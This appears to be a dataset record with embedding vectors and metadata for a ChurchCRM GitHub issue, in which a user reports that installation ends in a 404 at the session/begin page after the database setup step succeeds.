-0.0018098980654031038, 0.03859178349375725, 0.00847101304680109, 0.0012087177019566298, 0.005034658592194319, 0.004133796319365501, -0.008020581677556038, 0.001409413875080645, -0.01580868288874626, -0.0022539724595844746, 0.0075556207448244095, 0.012444978579878807, 0.023407893255352974, 0.0020705305505543947, 0.004420764744281769, 0.00871075876057148, 0.017959129065275192, -0.0076355356723070145, -0.00021011799981351942, -0.01609928347170353, -0.0062951394356787205, 0.0046750400215387344, 0.0031166935805231333, 0.0004561070236377418, 0.004482517018914223, 0.010715903714299202, 0.0027207499369978905, 0.007054334040731192, 0.005361584480851889, 0.0048021781258285046, -0.004566065035760403, 0.0031403047032654285, -0.007265019696205854, 0.002413802780210972, 0.030629323795437813, 0.0011524137808009982, 0.007897076196968555, -0.01470439974218607, 0.004235506523400545, 0.0069380938075482845, 0.0073812599293887615, 0.034610554575920105, 0.011994547210633755, 0.006411380134522915, 0.0002917359524872154, -0.023393362760543823, 0.008318447507917881, 0.01593945361673832, -0.01455183420330286, 0.04286361485719681, 0.0009571663686074317, 0.014253968372941017, -0.0013313149102032185, 0.04722262918949127, -0.015503551810979843, 0.006371422205120325, -0.007751775905489922, 0.017871947959065437, -0.010824879631400108, -0.016825785860419273, -0.011100949719548225, -0.032779768109321594, 0.017959129065275192, 0.02959769032895565, 0.0034908419474959373, -0.0036434074863791466, -0.008405627682805061, -0.01643347553908825, 0.03902768716216087, 0.0023084599524736404, 0.024948077276349068, 0.012248823419213295, -0.013629176653921604, 0.015997573733329773, 0.006712878122925758, 0.019978804513812065, -0.0038504605181515217, 0.005648552905768156, 0.010374448262155056, -0.01676766574382782, -0.008790673688054085, 0.02085060626268387, -0.00426819920539856, -0.024875428527593613, -0.011050094850361347, 0.008158616721630096, 0.01662236452102661, -0.00977871660143137, 0.0032783402130007744, -0.006189796607941389, -0.0036470398772507906, -0.011958222836256027, 0.024759186431765556, -0.01824972964823246, -0.0029495980124920607, -0.007722715847194195, 0.017857419326901436, 0.028813067823648453, -0.002800665097311139, -0.01871469058096409, -0.00607718899846077, -0.002155894646421075, 0.005775690544396639, -0.017159976065158844, 0.011217190884053707, 0.017043735831975937, -0.016317233443260193, -0.007940666750073433, 0.019194182008504868, 0.011093685403466225, 0.027984855696558952, 0.009408200159668922, -0.002244891133159399, -0.01627364382147789, 0.0032783402130007744, 0.01126078050583601 ]
null
null
null
null
null
null
null
null
null
[ "ChurchCRM", "CRM" ]
**Description** - ChurchCRM version: [e.g. 5.7.0] - PHP version the server running: [e.g. PHP 8.1.27] - DB Server and Version the server is running: MariaDB 10.6.16 - Nginx 1.18.0 **Steps To Reproduce** Steps to reproduce the behavior: Went through the first setup page, the final step being to enter the database name and user (members) and then the database password. This was successful, and the database was populated with churchrcm tables, but the next page was a 404 at the URL: http://members.stnicholassaratoga.org/churchcrm/session/begin Don't know where to go from here.
Bug: Install Fails with a 404
https://api.github.com/repos/ChurchCRM/CRM/issues/6945/comments
2
2024-04-18T23:33:09
2024-05-13T11:41:53Z
https://github.com/ChurchCRM/CRM/issues/6945
2,251,773,565
6,945
false
This is a GitHub Issue repo:CRM owner:ChurchCRM Title : Bug: Install Fails with a 404 Issue date: --- start body --- **Description** - ChurchCRM version: [e.g. 5.7.0] - PHP version the server running: [e.g. PHP 8.1.27] - DB Server and Version the server is running: MariaDB 10.6.16 - Nginx 1.18.0 **Steps To Reproduce** Steps to reproduce the behavior: Went through the first setup page, the final step being to enter the database name and user (members) and then the database password. This was successful, and the database was populated with churchrcm tables, but the next page was a 404 at the URL: http://members.stnicholassaratoga.org/churchcrm/session/begin Don't know where to go from here. --- end body ---
734
[ -0.027407947927713394, 0.004640518222004175, -0.006142177153378725, 0.022556984797120094, -0.01586550660431385, -0.03749510273337364, 0.025795716792345047, 0.04485715180635452, -0.0048188623040914536, 0.03606834635138512, 0.029362602159380913, 0.005482302978634834, -0.044971294701099396, -0.03367140144109726, -0.0162507314234972, 0.0030354196205735207, -0.06431808322668076, 0.009359507821500301, 0.018704747781157494, 0.0002753189764916897, -0.014795441180467606, 0.00965912640094757, 0.02552463300526142, 0.02145838364958763, -0.04973665252327919, 0.00002353308445890434, -0.02769329957664013, 0.008103963918983936, -0.014538625255227089, -0.010244095697999, 0.018319524824619293, 0.011349829845130444, 0.029904767870903015, 0.018062708899378777, 0.022385774180293083, 0.0015212766593322158, 0.01209887582808733, 0.03595420718193054, -0.0211016945540905, 0.04434351995587349, 0.006591604556888342, -0.009152628481388092, -0.004237459972500801, 0.03429917246103287, 0.005357461981475353, -0.024083610624074936, -0.0051862518303096294, -0.021187299862504005, -0.01189199648797512, 0.03344311937689781, -0.005150582641363144, -0.00721224257722497, -0.011656582355499268, -0.03113177791237831, 0.03538350388407707, -0.03190222382545471, 0.06152164191007614, 0.02787877805531025, -0.004433638881891966, -0.019589334726333618, -0.04859524965286255, 0.019432391971349716, 0.037067074328660965, 0.02558170258998871, 0.005179117899388075, 0.08697494119405746, -0.011849193833768368, 0.02242857590317726, -0.02088768221437931, 0.0021597491577267647, 0.023284628987312317, 0.0008622945751994848, 0.04069102928042412, 0.01256970502436161, -0.0061992472037673, 0.0020884114783257246, 0.04428645223379135, 0.009930209256708622, -0.03521229326725006, -0.011478237807750702, -0.015922578051686287, -0.0026715972926467657, -0.009409444406628609, -0.010572249069809914, 0.04103345051407814, 0.005721284542232752, -0.018091242760419846, -0.08006944507360458, -0.030475471168756485, -0.005764087196439505, 0.008353645913302898, -0.00968052726238966, 0.007137338165193796, -0.02886323817074299, 0.034955479204654694, -0.025653041899204254, -0.021758001297712326, 0.022114690393209457, -0.021758001297712326, -0.011927665211260319, -0.006827019155025482, -0.025439027696847916, -0.0019403857877478004, -0.010607917793095112, 0.023298896849155426, -0.003944975323975086, 0.011749320663511753, -0.02959088236093521, 0.017335064709186554, 0.04671193286776543, 0.011663715355098248, -0.004451473243534565, -0.007044598925858736, -0.031873688101768494, -0.010215559974312782, 0.03170247748494148, 0.016393406316637993, -0.00038789879181422293, -0.03863650560379028, 0.025282084941864014, -0.01916131004691124, -0.038978926837444305, -0.0029569482430815697, -0.013582699932157993, -0.049051810055971146, 0.021144498139619827, 0.008275174535810947, 0.039178669452667236, -0.016778629273176193, 0.043059442192316055, 0.006998229306191206, -0.01482397597283125, 0.012840787880122662, 0.04993639886379242, 0.039207205176353455, -0.012377092614769936, -0.02111596241593361, -0.013211743906140327, 0.024540172889828682, -0.020416852086782455, -0.06677209585905075, -0.016778629273176193, -0.02267112396657467, -0.0031959295738488436, -0.02884897030889988, 0.03601127490401268, -0.020359782502055168, -0.008867277763783932, 0.002616310492157936, -0.007044598925858736, -0.04494275897741318, -0.027222471311688423, 0.008246639743447304, 0.05901055410504341, 0.03555471450090408, -0.026623234152793884, 0.02746501937508583, 0.004747524857521057, -0.0019510864512994885, -0.015508818440139294, -0.026965655386447906, 0.0010905752424150705, -0.02382679469883442, -0.02939113788306713, 0.0542166605591774, 0.025310620665550232, -0.01607952080667019, 0.007169439923018217, -0.004023446701467037, 0.010108553804457188, 0.022770997136831284, -0.004123319871723652, -0.0465121865272522, 0.01936105452477932, -0.04819575697183609, -0.03461305797100067, 0.029676487669348717, 0.0019386023050174117, 0.020802076905965805, -0.02050245739519596, 0.004408670589327812, -0.01744920387864113, 0.0007909568957984447, -0.037866055965423584, 0.03806580230593681, 0.022942207753658295, -0.012812253087759018, -0.0017085381550714374, 0.022514181211590767, -0.03330044448375702, 0.004323065280914307, 0.004929435905069113, 0.017292261123657227, -0.03290095180273056, -0.018833156675100327, 0.01782016083598137, -0.03929281234741211, 0.011278492398560047, 0.04243167117238045, -0.05013614520430565, 0.0294196717441082, -0.015309073030948639, -0.02900591306388378, 0.04040567949414253, 0.028206931427121162, 0.06363324075937271, -0.00044073330354876816, 0.056585073471069336, -0.008738869801163673, -0.02228590101003647, -0.0018093027174472809, 0.008246639743447304, 0.0034598789643496275, 0.010465241968631744, -0.023127686232328415, 0.016778629273176193, -0.031845156103372574, 0.015808437019586563, 0.0076545365154743195, 0.027022724971175194, -0.016978375613689423, -0.050022002309560776, 0.013418623246252537, 0.021943479776382446, 0.011670849286019802, -0.014274676330387592, -0.012890724465250969, -0.00415898859500885, 0.01860487461090088, 0.020274177193641663, -0.01548028364777565, -0.015737099573016167, 0.01005861721932888, 0.048481110483407974, 0.037637777626514435, 0.018476467579603195, 0.002753635635599494, -0.0055144052021205425, -0.026623234152793884, 0.017877230420708656, 0.028692027553915977, 0.05669921264052391, -0.013261680491268635, -0.018690479919314384, 0.009766132570803165, -0.0035187327302992344, 0.00396994361653924, 0.01993175595998764, -0.02051672525703907, -0.053531818091869354, -0.013675439171493053, 0.01045810803771019, 0.008182435296475887, -0.008824475109577179, -0.011784990318119526, 0.054502010345458984, -0.02864922396838665, 0.0018761818064376712, 0.030646679922938347, 0.01326881442219019, -0.01976054534316063, 0.008068295195698738, -0.010771994479000568, 0.00861759576946497, 0.04685460776090622, 0.01229148730635643, -0.04223192483186722, 0.007504727225750685, 0.003076438792049885, -0.010686389170587063, 0.0608367994427681, -0.009737597778439522, 0.009102691896259785, -0.012897858396172523, -0.008924347348511219, -0.001990322256460786, 0.002318475628271699, 0.0013857349986210465, 0.038836248219013214, 0.04206071421504021, 0.03158833831548691, -0.021986283361911774, 0.02131570875644684, -0.012883590534329414, -0.011292759329080582, 0.050649773329496384, 0.013468559831380844, -0.05027882009744644, -0.028734829276800156, 0.04043421521782875, -0.03735242411494255, -0.04645511880517006, -0.02105889283120632, 0.0069589936174452305, 0.009409444406628609, 0.03766631335020065, -0.006363323889672756, 0.026979923248291016, -0.0006942051113583148, 0.02555316872894764, 0.028606422245502472, 0.040320076048374176, -0.017920034006237984, -0.005642813164740801, -0.009837470017373562, 0.01971774362027645, 0.005835424643009901, 0.010536580346524715, -0.0311888474971056, -0.018719015643000603, 0.06534534692764282, -0.02745075151324272, 0.03906453028321266, 0.015323339961469173, 0.007272879593074322, 0.007768676616251469, 0.028192663565278053, -0.023926667869091034, -0.03364286571741104, -0.035526178777217865, -0.034755732864141464, -0.015037989243865013, -0.029362602159380913, -0.03056107647716999, 0.00465121865272522, -0.028206931427121162, 0.0066486746072769165, 0.020773541182279587, -0.03518375754356384, 0.023855330422520638, 0.0057498193345963955, -0.020202839747071266, 0.006466763559728861, -0.001155670965090394, 0.016721559688448906, -0.020488191395998, 0.02151545323431492, 0.014060663059353828, 0.036639049649238586, -0.021001821383833885, -0.04083370417356491, 0.004529944621026516, -0.004084084182977676, 0.003331471234560013, 0.0073905871249735355, 0.020645134150981903, 0.018861690536141396, -0.015765633434057236, 0.06060852110385895, -0.037808988243341446, 0.0008868169388733804, 0.03130298852920532, -0.028763365000486374, -0.00036582868779078126, 0.04645511880517006, 0.01431034505367279, 0.007244344800710678, -0.019246915355324745, 0.0020527427550405264, 0.006588037591427565, 0.04816722124814987, -0.0363536961376667, 0.01570856384932995, 0.0309605672955513, 0.012455563992261887, -0.012227283790707588, 0.005015041213482618, 0.030047444626688957, 0.005061410833150148, -0.04562760144472122, -0.019075704738497734, 0.00002523292823752854, -0.026166671887040138, -0.025867054238915443, -0.057755012065172195, 0.014510090462863445, -0.014524358324706554, 0.030047444626688957, -0.0378945916891098, 0.013511362485587597, 0.008439251221716404, -0.03275827690958977, -0.030703751370310783, 0.023184755817055702, 0.01228435430675745, -0.023955203592777252, 0.040748100727796555, 0.004469307605177164, 0.006077973172068596, -0.010572249069809914, -0.029505277052521706, 0.016921306028962135, -0.03330044448375702, -0.05535806342959404, -0.013917987234890461, -0.021772269159555435, 0.02281380072236061, -0.04699728265404701, 0.02073073945939541, -0.006238482892513275, -0.00878880638629198, -0.0038237012922763824, 0.011364097706973553, 0.02435469441115856, 0.0076260012574493885, -0.00791848637163639, 0.024454567581415176, -0.04397256672382355, -0.005667780991643667, 0.015494550578296185, 0.0054395003244280815, 0.002382679609581828, 0.0006085998611524701, 0.018076976761221886, 0.016764361411333084, 0.010950339026749134, -0.018619142472743988, -0.014417351223528385, 0.008867277763783932, 0.021914944052696228, 0.018134046345949173, -0.0002646183129400015, 0.002275672974064946, -0.005999501328915358, 0.01913277432322502, 0.012655310332775116, -0.03655344247817993, 0.027251005172729492, 0.03792312741279602, -0.006951860152184963, 0.0004405103682074696, 0.009166896343231201, 0.002503953641280532, 0.003966376651078463, 0.03735242411494255, 0.012198748998343945, -0.008581927046179771, 0.009124093689024448, 0.023341698572039604, 0.005393131170421839, -0.013982191681861877, 0.0452851802110672, -0.009758998639881611, 0.03623955696821213, -0.013796713203191757, 0.008118231780827045, -0.03969230130314827, 0.012034672312438488, 0.048852063715457916, -0.00029025532421655953, 0.0309605672955513, 0.02575291320681572, -0.007982689887285233, -0.023955203592777252, -0.025453295558691025, -0.0016131240408867598, -0.0288061685860157, 0.00355796841904521, 0.03960669785737991, -0.015466015785932541, -0.014324611984193325, -0.028164127841591835, 0.02712259814143181, 0.01122855581343174, 0.028135593980550766, -0.009216831997036934, -0.02324182726442814, -0.025838518515229225, 0.02750782109797001, 0.004455040208995342, 0.03766631335020065, 0.01819111593067646, 0.034555986523628235, 0.029177123680710793, -0.017306528985500336, 0.003306502941995859, -0.027950115501880646, 0.0274935532361269, 0.013382954522967339, 0.012512634508311749, -0.0557575561106205, 0.008967150002717972, -0.005610710941255093, -0.008389314636588097, 0.0007704473100602627, 0.01877608522772789, 0.0033154201228171587, -0.00556790828704834, -0.011692251078784466, 0.0314171276986599, -0.0011110848281532526, -0.0066772098653018475, -0.016992643475532532, -0.027750369161367416, 0.0027375847566872835, -0.03484134003520012, 0.00938090868294239, -0.016878502443432808, -0.0010219126706942916, -0.03058961033821106, 0.02866349183022976, -0.0008056702790781856, 0.01605098508298397, 0.014752638526260853, 0.020031629130244255, 0.0077044726349413395, 0.015037989243865013, 0.0006045870832167566, -0.008724601939320564, 0.05261869728565216, 0.00512561434879899, -0.017135318368673325, -0.022200295701622963, 0.0004940136568620801, -0.0092025650665164, -0.0035437007900327444, -0.026623234152793884, 0.011249956674873829, 0.01353276427835226, 0.012041805312037468, 0.0006634407327510417, -0.012641042470932007, -0.013917987234890461, 0.019261181354522705, -0.0029408971313387156, -0.006516700144857168, 0.033015090972185135, 0.007155172526836395, -0.014474421739578247, 0.0002269430988235399, -0.004504976328462362, 0.004287396557629108, 0.03561178594827652, 0.02595265954732895, -0.016707291826605797, 0.014966651797294617, -0.0059031955897808075, -0.006966127548366785, -0.0028231898322701454, -0.02322755940258503, -0.04160415381193161, 0.00498293898999691, -0.03952109068632126, -0.002341660438105464, -0.006887656170874834, -0.002896310994401574, -0.028563620522618294, 0.03643930330872536, 0.02030271291732788, -0.014866778627038002, 0.00198497180826962, 0.00507567822933197, 0.0208734143525362, 0.0061350432224571705, -0.01720665581524372, 0.01052944641560316, 0.038037266582250595, 0.04077663645148277, 0.01993175595998764, 0.024326158687472343, 0.015252002514898777, -0.024625778198242188, 0.0038700709119439125, 0.0037452299147844315, -0.018319524824619293, -0.01971774362027645, -0.03983497619628906, 0.018505001440644264, -0.015109327621757984, -0.013903720304369926, 0.032415855675935745, -0.007016064133495092, -0.022999277338385582, -0.01565149426460266, 0.030275724828243256, 0.007611733861267567, 0.013247412629425526, -0.0064168269746005535, -0.030874961987137794, 0.017663218080997467, 0.0162507314234972, -0.015095059759914875, 0.007044598925858736, -0.014980919659137726, 0.000020189128917991184, 0.0170211773365736, 0.015494550578296185, -0.024682847782969475, -0.03058961033821106, -0.017934300005435944, 0.0007896192837506533, 0.001814653049223125, -0.008296575397253036, 0.01104307733476162, 0.02593839168548584, -0.006013769190758467, -0.007247911300510168, 0.03892185539007187, 0.050392959266901016, -0.007001796271651983, -0.021215835586190224, 0.016379138454794884, 0.021372778341174126, -0.0203312486410141, -0.014567160978913307, 0.014923849143087864, 0.0251822117716074, 0.008774538524448872, -0.013147540390491486, -0.0009782183915376663, -0.04368721321225166, -0.0004260198911651969, 0.06973974406719208, -0.012048939242959023, 0.0020759273320436478, 0.0036186054348945618, 0.03575446084141731, 0.012612507678568363, 0.00871746800839901, -0.007904218509793282, -0.010244095697999, -0.0039164405316114426, 0.005528672598302364, -0.013682573102414608, -0.00003500006641843356, 0.03098910115659237, 0.0004931219154968858, 0.004109052009880543, 0.0014249708037823439, -0.007647402584552765, -0.040719565004110336, -0.007932753302156925, -0.010843331925570965, -0.024040808901190758, 0.014695568941533566, 0.02128717303276062, 0.012205881997942924, -0.005664214491844177, -0.02961941808462143, -0.030104514211416245, -0.01518066506832838, 0.018333792686462402, -0.0010138872312381864, 0.09079863876104355, -0.028135593980550766, 0.02031698077917099, -0.008096829988062382, 0.00348663073964417, 0.02590985596179962, 0.03732389211654663, -0.003302935976535082, 0.002962298458442092, 0.020616598427295685, 0.014752638526260853, -0.010008680634200573, 0.00861759576946497, -0.0023006412666291, 0.03672465309500694, 0.016521813347935677, -0.016293533146381378, -0.01518066506832838, -0.012205881997942924, -0.00977326650172472, -0.03703853860497475, 0.016578884795308113, 0.004194657318294048, -0.015209199860692024, -0.014481555670499802, 0.00615287758409977, 0.03875064477324486, 0.036667585372924805, 0.004683320876210928, -0.029276996850967407, -0.02342730388045311, -0.015494550578296185, -0.01589404232800007, -0.0014802574878558517, 0.020859146490693092, -0.009466513991355896, 0.011378364637494087, -0.03778045251965523, 0.0034598789643496275, -0.02766476385295391, 0.015622958540916443, 0.014524358324706554, 0.009973011910915375, -0.02305634878575802, -0.00271261646412313, 0.024240555241703987, -0.03210197016596794, -0.0030621711630374193, 0.04773919656872749, 0.04765358939766884, 0.022913672029972076, 0.013903720304369926, -0.003133509075269103, 0.0004561154928524047, -0.015266270376741886, -0.011749320663511753, -0.005924596916884184, -0.014224739745259285, -0.008724601939320564, 0.0017450987361371517, -0.022999277338385582, 0.015252002514898777, 0.0057462528347969055, 0.0017745256191119552, -0.0009568170644342899, 0.04562760144472122, 0.02632361464202404, -0.01665022224187851, -0.01934678666293621, -0.02439749799668789, 0.0036917265970259905, -0.00653096754103899, 0.012676711194217205, 0.014795441180467606, -0.017763089388608932, 0.020745007321238518, 0.01103594433516264, -0.022171759977936745, 0.005575042217969894, -0.014602829702198505, -0.005460901651531458, 0.012997730635106564, 0.009944477118551731, 0.007272879593074322, 0.009573521092534065, 0.004476441536098719, 0.012106009759008884, -0.018918761983513832, -0.03837968781590462, 0.03409942612051964, 0.000012191503628855571, -0.01355416513979435, 0.007568931207060814, 0.0185620728880167, -0.002211468992754817, 0.003336821449920535, 0.04057689011096954, -0.02571011148393154, -0.006227781996130943, -0.0013224228750914335, -0.006356189958751202, 0.01763468235731125, 0.01499518658965826, 0.0008480270626023412, 0.02653762884438038, 0.004201791249215603, -0.005107779987156391, 0.021001821383833885, 0.020959019660949707, 0.0009541418985463679, -0.018490735441446304, -0.007169439923018217, -0.01065785437822342, 0.03381407633423805, -0.009388042613863945, 0.0066772098653018475, -0.02127290517091751, 0.02030271291732788, -0.022699659690260887, 0.017506273463368416, 0.032958023250103, 0.01700690947473049, -0.01500945445150137, 0.008389314636588097, 0.015052257105708122, 0.007130204234272242, -0.023741191253066063, -0.00928103644400835, 0.012626774609088898, 0.004701155237853527, -0.006712878588587046, -0.015023722313344479, -0.04260288178920746, -0.009744731709361076, -0.009937343187630177, -0.023655585944652557, -0.014445886947214603, -0.05084951967000961, -0.009495049715042114, 0.037067074328660965, 0.009273902513086796, 0.006131476256996393, -0.007123070303350687, -0.003738095983862877, -0.025196479633450508, 0.015351875685155392, 0.017748823389410973, -0.013868050649762154, -0.00042267594835720956, -0.029162855818867683, -0.03718121349811554, 0.013283082284033298, -0.027793172746896744, -0.0020901949610561132, 0.004376568365842104, 0.008268040604889393, 0.001967137446627021, 0.011285626329481602, -0.0071587394922971725, -0.039007458835840225, 2.751796444044885e-7, -0.023912400007247925, 0.007568931207060814, 0.009495049715042114, 0.005831857677549124, -0.010365369729697704, 0.013989325612783432, 0.022571252658963203, 0.019803348928689957, -0.020573796704411507, 0.0184051301330328, 0.010907536372542381, 0.009552119299769402, 0.009152628481388092, 0.009602055884897709, -0.01104307733476162, 0.04200364276766777, 0.0033617897424846888, 0.01897583156824112, -0.002272106008604169, -0.016978375613689423, -0.0010138872312381864, -0.01104307733476162, 0.00256102392449975, 0.006552368868142366, 0.03478426858782768, -0.0031959295738488436, -0.011827792972326279, 0.00004280262510292232, 0.002527138451114297, 0.012362825684249401, -0.015423213131725788, 0.01937532238662243, 0.015252002514898777, 0.0015186015516519547, -0.022371506318449974, -0.004701155237853527, -0.025053804740309715, -0.0035187327302992344, 0.012134544551372528, -0.013197476975619793, -0.02187214232981205, 0.008610461838543415, 0.0037059939932078123, 0.008960017003118992, 0.013960789889097214, -0.0024290489964187145, 0.0055144052021205425, 0.047710660845041275, -0.011150084435939789, -0.023284628987312317, 0.025681575760245323, 0.006730712950229645, 0.048509642481803894, 0.042888231575489044, -0.0020545260049402714, -0.001135161379352212, -0.006470330525189638, 0.008653264492750168, -0.0021044625900685787, 0.03772338107228279, 0.029562348499894142, -0.024868326261639595, 0.028321070596575737, -0.026594698429107666, -0.011007408611476421, -0.008303709328174591, -0.00011113077925983816, -0.0417468287050724, -0.024468835443258286, 0.010565115138888359, -0.016521813347935677, -0.0015694296453148127, -0.0014347797259688377, 0.0024522338062524796, -0.021543988958001137, -0.016550349071621895, -0.013090469874441624, 0.022485647350549698, -0.03133152425289154, -0.03929281234741211, 0.01643620803952217, -0.026280812919139862, 0.018847422674298286, 0.007340650539845228, -0.006081539671868086, 0.000366497493814677, -0.010065751150250435, 0.010315433144569397, -0.026765909045934677, -0.0077044726349413395, 0.024640046060085297, 0.0033760571386665106, 0.013925121165812016, 0.012997730635106564, -0.03806580230593681, 0.008767404593527317, 0.013982191681861877, 0.024540172889828682, 0.009880272671580315, -0.023869598284363747, 0.02593839168548584, 0.030161583796143532, 0.03586860001087189, -0.005735551938414574, -0.022128958255052567, 0.01230575516819954, 0.011792123317718506, -0.023712655529379845, -0.014538625255227089, -0.03019011951982975, -0.014838243834674358, -0.030532540753483772, -0.026780176907777786, 0.026780176907777786, -0.00594599824398756, 0.002635928336530924, 0.014866778627038002, 0.024839790537953377, 0.03324337303638458, 0.024497369304299355, -0.0073905871249735355, -0.007208675611764193, 0.015808437019586563, 0.012583971954882145, 0.0026555464137345552, 0.024069344624876976, 0.006406126543879509, -0.012255818583071232, -0.039977654814720154, 0.004875932354480028, 0.004230326507240534, -0.027821706607937813, 0.032444391399621964, 0.0029836997855454683, 0.009687661193311214, -0.007151605561375618, -0.0018993666162714362, 0.006427527870982885, -0.006448929198086262, -0.023070616647601128, -0.01819111593067646, -0.0011307026725262403, 0.017706019803881645, 0.005667780991643667, 0.0039200070314109325, -0.0654594823718071, -0.0026198774576187134, -0.030075978487730026, 0.01899009943008423, 0.009552119299769402, -0.0027572026010602713, 0.02148691937327385, -0.018333792686462402, 0.017292261123657227, -0.005232620984315872, 0.01373964361846447, -0.007090968545526266, -0.0000863297755131498, 0.003588286926969886, 0.007711606565862894, 0.013654038310050964, 0.04180390015244484, -0.0033582227770239115, 0.010386770591139793, 0.04180390015244484, -0.005828291177749634, -0.008910080417990685, 0.031616874039173126, 0.007026764564216137, -0.008674665354192257, -0.04197511076927185, 0.034156497567892075, 0.006698611192405224, 0.0007971989107318223, -0.045770276337862015, -0.006063705310225487, 0.018105510622262955, -0.035668857395648956, 0.005799755919724703, 0.002710832981392741, 0.017720287665724754, -0.00890294648706913, -0.006124342326074839, -0.0002637266006786376, -0.017648950219154358, -0.017063980922102928, 0.012983463704586029, -0.016008183360099792, 0.015523086301982403, -0.040377143770456314, 0.024326158687472343, 0.014103465713560581, 0.02692285180091858, -0.021972015500068665, -0.007333516608923674, -0.010536580346524715, -0.014296077191829681, 0.015152130275964737, 0.02767903171479702, -0.007012497168034315, -0.008560525253415108, 0.03387114405632019, -0.021629594266414642, -0.01374677661806345, -0.001806627493351698, 0.005346761550754309, 0.021415580064058304, 0.01336868666112423, -0.0022310868371278048, -0.016336336731910706, 0.0014445886481553316, 0.01395365595817566, -0.018148314207792282, 0.025025269016623497, 0.019660674035549164, 0.00822523795068264, -0.029134321957826614, 0.00217401678673923, 0.025981195271015167, 0.018248187378048897, -0.017506273463368416, 0.02555316872894764, -0.0063383555971086025, 0.000832421937957406, 0.008988551795482635, 0.021215835586190224, -0.007911352440714836, 0.01472410373389721, 0.025510365143418312, 0.006655808538198471, 0.014495822601020336, -0.0024896860122680664, -0.0025824252516031265, -0.012020404450595379, -0.012626774609088898, 0.020259909331798553, 0.04531371593475342, 0.009780400432646275, -0.01646474376320839, 0.007754409220069647, 0.017848694697022438, -0.012391360476613045, -0.018490735441446304, 0.0018012771615758538, -0.025053804740309715, -0.05296111851930618, 0.03800873085856438, -0.008282308466732502, 0.00301936874166131, -0.015351875685155392, 0.0032690507359802723, 0.018505001440644264, -0.008046893402934074, -0.03038986586034298, -0.017306528985500336, -0.002395163755863905, 0.0035508344881236553, 0.010229827836155891, 0.005771220661699772, -0.00012863081065006554, 0.008531990461051464, -0.006573770195245743, 0.023341698572039604, 0.004758225288242102, -0.009844603948295116, 0.00022939532937016338, -0.002461150987073779, -0.00958065502345562, 0.028306804597377777, -0.006637974176555872, 0.02999037317931652, 0.0325014628469944, 0.012241551652550697, 0.015052257105708122, 0.00648459792137146, -0.016022449359297752, 0.023769725114107132, -0.0047225565649569035, 0.008539124391973019, 0.005257589276880026, -0.0162507314234972, -0.017135318368673325, -0.007961289025843143, -0.0052825575694441795, -0.039949119091033936, -0.02170093171298504, -0.020859146490693092, -0.03952109068632126, -0.0027322343084961176, -0.024854058399796486, -0.014560027047991753, -0.005910329520702362, 0.022599786520004272, 0.08223811537027359, 0.018105510622262955, -0.014567160978913307, 0.025510365143418312, -0.026951387524604797, -0.012662443332374096, 0.02498246729373932, -0.011827792972326279, 0.0019279016414657235, -0.021543988958001137, 0.004069816321134567, -0.00561427790671587, -0.005200519226491451, 0.002412998117506504, -0.0030710885766893625, 0.010914670303463936, -0.005632112268358469, -0.019817616790533066, 0.004572747275233269, -0.009552119299769402, 0.0008966258610598743, 0.018148314207792282, 0.007790077943354845, 0.016978375613689423, -0.02182934060692787, -0.0013696840032935143, -0.006520266644656658, -0.016022449359297752, -0.0291913915425539, -0.006142177153378725, 0.022485647350549698, 0.01996029168367386, -0.0014178369892761111, 0.019974559545516968, -0.005168417003005743, -0.0011182186426594853, 0.0021615326404571533, 0.01374677661806345, -0.029305532574653625, -0.026266545057296753, -0.007618867792189121, -0.006370457820594311, -0.02184360660612583, -0.012020404450595379, -0.009908808395266533, 0.0030532539822161198, -0.011635180562734604, -0.019617870450019836, -0.006049437914043665, -0.014852511696517467, 0.0017700669122859836, -0.011207154020667076, -0.002735801273956895, -0.00041777145816013217, -0.015508818440139294, -0.038208477199077606, -0.014110599644482136, 0.02558170258998871, 0.011278492398560047, 0.006085106637328863, 0.012962061911821365, 0.002473635133355856, 0.016778629273176193, 0.0170211773365736, 0.009223965927958488, 0.001799493795260787, -0.011328428983688354, -0.011449703015387058, -0.0075189946219325066, 0.04919448494911194, -0.008660398423671722, 0.023127686232328415, -0.036639049649238586, 0.005960265640169382, 0.010443841107189655, 0.008068295195698738, 0.0009389826445840299, 0.015095059759914875, 0.006384725216776133, -0.01249836664646864, -0.007697339169681072, 0.0024825523141771555, -0.017163854092359543, -0.0067200125195086, -0.006744980812072754, 0.019674940034747124, -0.0002889177412725985, 0.005860392935574055, 0.018119778484106064, -0.012612507678568363, 0.009937343187630177, 0.005321793258190155, 0.022114690393209457, 0.014581427909433842, 0.006092240568250418, 0.005817590281367302, 0.036268092691898346, -0.01570856384932995, -0.028135593980550766, -0.0247969888150692, 0.002635928336530924, 0.006099374499171972, 0.001794143463484943, 0.006231348961591721, -0.027821706607937813, 0.055044177919626236, 0.025781448930501938, 0.026081066578626633, -0.012148812413215637, 0.0037630642764270306, -0.02981916256248951, -0.001636308734305203, 0.0030282859224826097, 0.01052944641560316, -0.018476467579603195, 0.002043825341388583, 0.018890226259827614, 0.013753910548985004, 0.013468559831380844, -0.011399766430258751, 0.0043373326770961285, -0.007882816717028618, 0.0021526154596358538, 0.0010504478123039007, 0.010871867649257183, -0.00007401287439279258, -0.01700690947473049, -0.015280538238584995, 0.022514181211590767, 0.011442569084465504, 0.0017754172440618277, 0.0253391545265913, 0.015223467722535133, 0.01229148730635643, 0.030675215646624565, -0.03906453028321266, 0.000016218182281590998, 0.01353276427835226, 0.005275423638522625, 0.0063383555971086025, 0.0061065079644322395, 0.020374050363898277, -0.0038308349903672934, 0.014395950362086296, 0.021972015500068665, 0.013111871667206287, -0.015337607823312283, 0.010586516000330448, 0.0025396225973963737, 0.009780400432646275, 0.014110599644482136, -0.05635679140686989, 0.0337284691631794, -0.0057498193345963955, 0.02790731191635132, -0.025624506175518036, -0.005243321880698204, -0.027707567438483238, 0.002181150484830141, -0.002022424014285207, 0.031274452805519104, 0.020259909331798553, 0.009288170374929905, 0.013390088453888893, 0.022885138168931007, 0.012997730635106564, 0.004829563200473785, 0.024854058399796486, -0.013111871667206287, 0.00324229896068573, 0.01973201148211956, 0.02267112396657467, -0.014003592543303967, -0.0005203194450587034, -0.0024236987810581923, -0.0028356739785522223, 0.0391216017305851, 0.0025253549683839083, -0.01971774362027645, 0.0039770775474607944, 0.024468835443258286, 0.007123070303350687, -0.008496321737766266, 0.012298621237277985, 0.006195680238306522, -0.006110074929893017, -0.022999277338385582, -0.014417351223528385, -0.01277658436447382, 0.020830612629652023, 0.000547071045730263, 0.03498401492834091, -0.013083335943520069, -0.010408172383904457, -0.02205762080848217, -0.018661946058273315, -0.005118480883538723, -0.00324229896068573, 0.010030082426965237, 0.011463969945907593, -0.01045810803771019, -0.01219161506742239, 0.018419397994875908, 